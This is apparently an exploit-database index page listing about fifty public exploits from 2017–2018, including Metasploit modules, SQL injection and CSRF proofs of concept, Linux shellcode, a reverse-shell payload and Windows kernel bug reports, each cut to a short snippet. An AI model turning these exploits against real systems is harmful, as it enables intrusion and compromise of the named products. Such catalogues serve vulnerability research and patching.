HPE iMC - dbman 'RestartDB' Remote Command Execution (Metasploit)

This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework class MetasploitModule 'HPE iMC dbman RestartDB Unauthenticated RCE', 'Description' = %q This module exploits a remote command execution vulnerablity in Hewlett Packard...

Muviko 1.1 - SQL Injection

Exploit Title: Muviko 1.1 - Multiple SQL Injection Exploit Author: Ahmad Mahfouz Contact: http://twitter.com/eln1x Date: 09/01/2018 CVE: CVE-2017-17970 Vendor Homepage: https://www.muvikoscript.com Version: 1.1 Tested on: Mac OS...

WordPress Plugin CMS Tree Page View 1.4 - Cross-Site Request Forgery / Privilege Escalation

Exploit Title: CMS Tree Page View CSRF, Privilege Escalation Discovery Date: 2017-12-12 Exploit Author: Panagiotis Vagenas Author Link: https://twitter.com/panVagenas Vendor Homepage: http://eskapism.se/ Software Link: https://wordpress.org/plugins/cms-tree-page-view Version: 1.4 Tested on:...

Parity Browser < 1.6.10 - Bypass Same Origin Policy

VuNote ====== Author: Ref: https://github.com/tintinweb/pub/tree/master/pocs/cve-2017-18016 Version: 0.3 Date: Jun 16th, 2017 Tag: parity same origin policy bypass webproxy token reuse Overview -------- Name: parity Vendor: paritytech References: https://parity.io/ 1 Version: 1.6.8 Latest Version...

HPE iMC - dbman 'RestoreDBase' Remote Command Execution (Metasploit)

This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework class MetasploitModule 'HPE iMC dbman RestoreDBase Unauthenticated RCE', 'Description' = %q This module exploits a remote command execution vulnerablity in Hewlett Packa...

Jungo Windriver 12.5.1 - Local Privilege Escalation

// ConsoleApplication1.cpp : Defines the entry point for the console application. // include "stdafx.h" include include define device L"\\.\WINDRVR1251" define SPRAYSIZE 30000 typedef NTSTATUSWINAPI PNtAllocateVirtualMemory HANDLE ProcessHandle, PVOID BaseAddress, ULONG ZeroBits, PULONG...

Microsoft Edge Chakra JIT - 'Lowerer::LowerSetConcatStrMultiItem' Missing Integer Overflow Check

/ The method "Lowerer::LowerSetConcatStrMultiItem" is used to generate machine code to concatenate strings. Here's a snippet of the method. void Lowerer::LowerSetConcatStrMultiItemIR::Instr instr ... IR::IndirOpnd dstLength = IR::IndirOpnd::NewconcatStrOpnd,...

Joomla! Component Easydiscuss < 4.0.21 - Cross-Site Scripting

Exploit Title: Joomla Plugin Easydiscuss inside the body, everything after the will be executed in the user’s browser. Works with every version up to 4.0.20 2. Proof of Concept Login with permissions to post a message, insert in the body and add any html code after that, whenever a user tries to...

WordPress Plugin Social Media Widget by Acurax 3.2.5 - Cross-Site Request Forgery

Exploit Title: Social Media Widget by Acurax CSRF Discovery Date: 2017-12-12 Exploit Author: Panagiotis Vagenas Author Link: https://twitter.com/panVagenas Vendor Homepage: http://www.acurax.com/ Software Link: https://wordpress.org/plugins/acurax-social-media-widget Version: 3.2.5 Tested on:...

WordPress Plugin Service Finder Booking < 3.2 - Local File Disclosure

Exploit Title: Worpress Plugin Service Finder Booking 3.2 - Local File Disclosure Google Dork: N/A Date: 09/01/2018 GMT+7 Exploit Author: telahdihapus Vendor Homepage: https://themeforest.net/user/aonetheme Software Link:...

SAP NetWeaver J2EE Engine 7.40 - SQL Injection

!/usr/bin/env python coding=utf-8 """ Author: Vahagn Vardanyan https://twitter.com/vah13 Bugs: CVE-2016-2386 SQL injection CVE-2016-2388 Information disclosure CVE-2016-1910 Crypto issue Follow HTTP request is a simple PoC for anon time-based SQL injection CVE-2016-2386 vulnerability in SAP...

WordPress Plugin WordPress Download Manager 2.9.60 - Cross-Site Request Forgery

Exploit Title: WordPress Download Manager CSRF Discovery Date: 2017-12-12 Exploit Author: Panagiotis Vagenas Author Link: https://twitter.com/panVagenas Vendor Homepage: https://www.wpdownloadmanager.com/ Software Link: https://wordpress.org/plugins/download-manager Version: 2.9.60 Tested on:...

Linux/x86 - execve(/bin/sh) + Polymorphic Shellcode (53 bytes)

Linux/x86 - execve/bin/sh + Polymorphic Shellcode 53 bytes. Shellcode exploit for Linuxx86 platform / Title: Linux/x86 - execve/bin/sh Polymorphic Shellcode 53 bytes Date: 10-Jan-2018 Exploit Author: Debashis Pal SLAE-1122 Tested on: i686 GNU/Linux '//bin/sh' = 0x68732f6e 0x69622f2f...

Linux/x86 - execve(/bin/dash) Shellcode (30 bytes)

Linux/x86 - execve/bin/dash Shellcode 30 bytes. Shellcode exploit for Linuxx86 platform / Description ; Title : exec /bin/dash - Shellcode ; Author : Hashim Jawad ; Website : ihack4falafel.com ; Twitter : @ihack4falafel ; SLAE ID : SLAE-1115 ; Purpose : spawn /bin/dash shell ; OS : Linux ; Arch :...

DiskBoss Enterprise 8.8.16 - Remote Buffer Overflow

Exploit Title: DiskBoss = 8.8.16 - Unauthenticated Remote Code Execution Date: 2017-08-27 Exploit Author: Arris Huijgen Vendor Homepage: http://www.diskboss.com/ Software Link: http://www.diskboss.com/setups/diskbossentsetupv8.8.16.exe Version: Through 8.8.16 Tested on: Windows 7 SP1 x64, Windows...

Synology Photostation 6.7.2-3429 - Remote Code Execution (Metasploit)

This module requires Metasploit: http://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework class MetasploitModule "Synology PhotoStation Multiple Vulnerabilities", 'Description' = %q This module exploits multiple vulnerabilities in Synology PhotoStation. When...

Multiple CPUs - Information Leak Using Speculative Execution

== INTRODUCTION == This is a bug report about a CPU security issue that affects processors by Intel, AMD and to some extent ARM. I have written a PoC for this issue that, when executed in userspace on an Intel Xeon CPU E5-1650 v3 machine with a modern Linux kernel, can leak around 2000 bytes per...

WordPress Plugin Events Calendar - 'event_id' SQL Injection

Exploit Title: Wichipi Events Calendar - SQL Injection Date: 09-01-2018 Exploit Author: Dennis Veninga Contact Author: d.veninga at networking4all.com Vendor Homepage: codecanyon.net/user/wachipi Version: 1.0 CVE-ID: CVE-2018-5315 Events Calendar allows you to easily add to your website a powerfu...

WordPress Plugin Admin Menu Tree Page View 2.6.9 - Cross-Site Request Forgery / Privilege Escalation

Exploit Title: Admin Menu Tree Page View CSRF, Privilege Escalation Discovery Date: 2017-12-12 Exploit Author: Panagiotis Vagenas Author Link: https://twitter.com/panVagenas Vendor Homepage: http://eskapism.se/ Software Link: https://wordpress.org/plugins/admin-menu-tree-page-view Version: 2.6.9...

Microsoft Edge Chakra JIT - BackwardPass::RemoveEmptyLoopAfterMemOp Does not Insert Branches

/ The optimizations for memory operations may leave empty loops as follows: for let i = 0; i arr.length; i++ arri = 0; Becomes: Memsetarr, 0, arr.length; for let i = 0; i arr.length; i++ // empty! These empty loops will be removed by "BackwardPass::RemoveEmptyLoopAfterMemOp". But this method just...

Microsoft Windows - 'nt!NtQueryInformationProcess (information class 76, QueryProcessEnergyValues)' Kernel Stack Memory Disclosure

/ We have discovered that the nt!NtQueryInformationProcess system call invoked with the 76 information class discloses portions of uninitialized kernel stack memory to user-mode clients. The specific information class is handled by an internal nt!PsQueryProcessEnergyValues function. While we don'...

Microsoft Windows - 'nt!NtQuerySystemInformation (information class 138, QueryMemoryTopologyInformation)' Kernel Pool Memory Disclosure

/ We have discovered that the nt!NtQuerySystemInformation system call invoked with the 138 information class discloses portions of uninitialized kernel pool memory to user-mode clients. The specific information class is handled by an internal nt!ExpQueryMemoryTopologyInformation function. While w...

Microsoft Edge Chakra JIT - Escape Analysis Bug

/ Escape analysis: https://en.wikipedia.org/wiki/Escapeanalysis Chakra fails to detect if "tmp" escapes the scope, allocates it to the stack. This may lead to dereference uninitialized stack values. PoC: / function opt let tmp = ; tmp0 = tmp; return tmp0; function main for let i = 0; i 0x1000; i+...

Commvault Communications Service (cvd) - Command Injection (Metasploit)

This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework require 'msf/core/exploit/powershell' class MetasploitModule 'Commvault Communications Service cvd Command Injection', 'Description' = %q This module exploits a command...

Microsoft Edge Chakra - 'asm.js' Out-of-Bounds Read

/ Here's a snippet of AsmJSByteCodeGenerator::EmitAsmJsFunctionBody. AsmJsVar initSource = nullptr; if decl-sxVar.pnodeInit-nop == knopName AsmJsSymbol initSym = mCompiler-LookupIdentifierdecl-sxVar.pnodeInit-name, mFunction; if initSym-GetSymbolType == AsmJsSymbol::Variable // in this case we ar...

Microsoft Edge Chakra JIT - Op_MaxInAnArray and Op_MinInAnArray can Explicitly call User-Defined JavaScript Functions

/ 1. Call patterns like "Math.max.applyMath, 1, 2, 3, 4, 5" and "Math.max.applyMath, arr" can be optimized to directly call the method "JavascriptMath::MaxInAnArray" in the Inline Phase. 2. The method takes the original method "Math.max" as the first parameter and the arguments object as the seco...

Microsoft Office - 'Composite Moniker Remote Code Execution

What? This repo contains a Proof of Concept exploit for CVE-2017-8570, a.k.a the "Composite Moniker" vulnerability. This demonstrates using the Packager.dll trick to drop an sct file into the %TEMP% directory, and then execute it using the primitive that the vulnerability provides. Download:...

BarcodeWiz ActiveX Control < 6.7 - Buffer Overflow (PoC)

Credits: John Page aka hyp3rlinx + Website: hyp3rlinx.altervista.org + Source: http://hyp3rlinx.altervista.org/advisories/BARCODEWIZ-v6.7-ACTIVEX-COMPONENT-BUFFER-OVERFLOW.txt + ISR: ApparitionSec Vendor: ================= www.barcodewiz.com Product: ============= BarcodeWiz ActiveX Control 6.7...

Photos in Wifi 1.0.1 - Path Traversal

Document Title: =============== Photos in Wifi 1.0.1 iOS - Path Traversal Web Vulnerability References Source: ==================== http://www.vulnerability-lab.com/getcontent.php?id=1600 Release Date: ============= 2018-01-04 Vulnerability Laboratory ID VL-ID: ===================================...

VX Search Enterprise 10.1.12 - Denial of Service

Exploit Title: VX Search Enterprise Server v10.1.12 - Denial of Service Date: 2017-10-20 Exploit Author: Ahmad Mahfouz Software Link: http://www.vxsearch.com/setups/vxsearchsrvsetupv10.1.12.exe Version: v10.1.12 Category; Windows Remote DOS CVE: CVE-2017-15662 Author Homepage: www.unixawy.com...

WordPress Plugin LearnDash 2.5.3 - Arbitrary File Upload

Exploit Title: WordPress LearnDash 2.5.3 Unauthenticated Arbitrary File Upload Date: 07-01-2018 Vendor Homepage: https://www.learndash.com/ Vendor Changelog: https://www.learndash.com/changelog/ Version: 2.5.3 Exploit Author: NinTechNet Author Advisory: http://nin.link/learndash/ Category: Webapp...

Microsoft Windows - Local XPS Print Spooler Sandbox Escape

Windows: Local XPS Print Spooler Sandbox Escape Platform: Windows 10 1703 and 1709 not tested Windows 7 or 8.x Class: Elevation of Privilege Summary: The local print spooler can be abused to create an arbitrary file from a low privilege application including one in an AC as well as a typical Edge...

Disk Pulse Enterprise 10.1.18 - Denial of Service

Exploit Title: Disk Pulse Enterprise Server v10.1.18 - DOS, Date: 2017-10-20 Exploit Author: Ahmad Mahfouz Software Link: http://www.diskpulse.com/setups/diskpulsesrvsetupv10.1.18.exe Version: v10.1.18 Category; Windows Remote DOS CVE: CVE-2017-15663 Author Twitter: @eln1x Description In Disk Pul...

Synology Photostation < 6.7.2-3429 - Multiple Vulnerabilities

Synology Photostation Multiple Vulnerabilities Vendor: Synology Product: Synology Photostation Version: = 6.7.2-3429 Website: http://www.synology.com / / / / / / / / / / / / / / / / / / / / / \ / // / // / / / / / / / // / / / /,/// // /// // GulfTech Research and Development Synology...

SonicWall NSA 6600/5600/4600/3600/2600/250M - Multiple Vulnerabilities

Document Title: =============== SonicWall SonicOS NSA Web Firewall - Multiple Web Vulnerabilities References Source: ==================== http://www.vulnerability-lab.com/getcontent.php?id=1725 Release Date: ============= 2018-01-06 Vulnerability Laboratory ID VL-ID:...

Vanilla < 2.1.5 - Cross-Site Request Forgery

Exploit Title: CSRF vulnerabilities in Vanilla Forums below 2.1.5-CVE-2017-1000432 Google Dork: NA Date: 7/1/2018 Contact: https://twitter.com/anandm47 website: https://anandtechzone.blogspot.in Exploit Author: Anand Meyyappan Vendor Homepage: https://open.vanillaforums.com Software Link:...

FiberHome LM53Q1 - Multiple Vulnerabilities

!/usr/bin/python /$$$$$$$$ /$$ /$$ /$$ /$$ /$$$$$$$ /$$ /$$$$$$$$ /$$ /$$ /$$ | $$/|/| $$ | $$ | $$ | $$ $$ | $$ | $$/ | $$ |/ | $$ | $$ /$$| $$$$$$$ /$$$$$$ /$$$$$$ | $$ | $$ /$$$$$$ /$$$$$$/$$$$ /$$$$$$ | $$ \ $$ /$$$$$$ /$$$$$$/$$$$ /$$$$$$ /$$$$$$ /$$$$$$ | $$ /$$ /$$ /$$$$$$ | $$ /$$$$$$ /$$...

Synology DiskStation Manager (DSM) < 6.1.3-15152 - 'forget_passwd.cgi' User Enumeration

Exploit Title: Synology DiskStation Manager DSM 6.1.3-15152 - 'forgetpasswd.cgi' User Enumeration Date: 01/05/2018 Exploit Author: Steve Kaun Vendor Homepage: https://www.synology.com Version: Before 6.1.3-15152 CVE : CVE-2017-9554 Previously this was identified by the developer and the disclosur...

Sync Breeze Enterprise 10.1.16 - Denial of Service

Exploit Title: Sync Breeze Enterprise Server v10.1.16 - Denial of Service Date: 2017-10-20 Exploit Author: Ahmad Mahfouz Software Link: http://www.syncbreeze.com/setups/syncbreezesrvsetupv10.1.16.exe Version: v10.1.16 Category; Windows Remote DOS CVE: CVE-2017-15664 Author Twitter: @eln1x...

Android - Inter-Process munmap due to Race Condition in ashmem

The MemoryIntArray class allows processes to share an in-memory array of integers backed by an "ashmem" file descriptor. As the class implements the Parcelable interface, it can be inserted into a Parcel, and optionally placed in a Bundle and transferred via binder to remote processes. Instead of...

DiskBoss Enterprise 8.5.12 - Denial of Service

Exploit Title: DiskBoss Enterprise Server 8.5.12 - Denial of Service Date: 2017-10-20 Exploit Author: Ahmad Mahfouz Software Link: http:///www.diskboss.com/setups/diskbosssrvsetupv8.5.12.exe Version: v10.1.16 Category; Windows Remote DOS CVE: CVE-2017-15665 Author Homepage: www.unixawy.com...

Microsoft Windows win32k - Using SetClassLong to Switch Between CS_CLASSDC and CS_OWNDC Corrupts DC Cache

Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1389&desc=6 Windows maintains a DC cache in win32kbase!gpDispInfo-pdceFirst. If you create multiple windows from a shared class while switching between CSOWNDC and CSCLASSDC, you can cause cache list entries to maintain references ...

Gespage 7.4.8 - SQL Injection

CVE-2017-7997 Gespage SQL Injection vulnerability Description Gespage is a web solution providing a printer portal. Official Website: http://www.gespage.com/ The web application does not properly filter several parameters sent by users, allowing authenticated SQL code injection Stacked Queries -...

GetGo Download Manager 5.3.0.2712 - 'Proxy' Buffer Overflow

Exploit Title: Buffer overflow vulnerability in GetGo Download Manager proxy options 5.3.0.2712 Date: 01-02-2018 Tested on Windows 8 64 bits Exploit Author: devcoinfet Contact: https://twitter.com/wabefet Software Link: http://www.getgosoft.com/getgodm/ Category: webapps Attack Type: Remote Impac...

gps-server.net GPS Tracking Software < 3.1 - Multiple Vulnerabilities

Exploit Title: GPS-SERVER.NET SAAS CMS Unfortunately each and every POST request in the CMS is going through function mysqlrealescapestring which will add slashes behind every quote in the payload. So you have to make sure your payload doesn't contain any quote. Fortunately, PHP is flexible enoug...

VMware Workstation - ALSA Config File Local Privilege Escalation (Metasploit)

This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework class MetasploitModule 'VMware Workstation ALSA Config File Local Privilege Escalation', 'Description' = %q This module exploits a vulnerability in VMware Workstation Pr...

Cisco IOS - Remote Code Execution

!/usr/bin/env python if False: ''' CVE-2017-6736 / cisco-sa-20170629-snmp Cisco IOS remote code execution =================== This repository contains Proof-Of-Concept code for exploiting remote code execution vulnerability in SNMP service disclosed by Cisco Systems on June 29th 2017 - Descriptio...

Linux/x86 - Reverse TCP (127.1.1.1:8888/TCP) Shell (/bin/sh) + Null-Free Shellcode (67/69 bytes)

Linux/x86 - Reverse TCP 127.1.1.1:8888/TCP Shell /bin/sh + Null-Free Shellcode 67/69 bytes. Shellcode exploit for Linuxx86 platform / Title: Linux/x86 - Reverse TCP Shell /bin/sh 127.1.1.1:8888/TCP Null-Free Shellcode 69 bytes Description: Smallest /bin/sh Reverse TCP ShellcodeNull Free, No...

Ayukov NFTP FTP Client 2.0 - Remote Buffer Overflow (Metasploit)

This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework class MetasploitModule 'Ayukov NFTP FTP Client Buffer Overflow', 'Description' = %q This module exploits a stack-based buffer overflow vulnerability against Ayukov NFTPD...

Xplico - Remote Code Execution (Metasploit)

This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework class MetasploitModule 'Xplico Remote Code Execution', 'Description' = %q This module exploits command injection vulnerability. Unauthenticated users can register a new...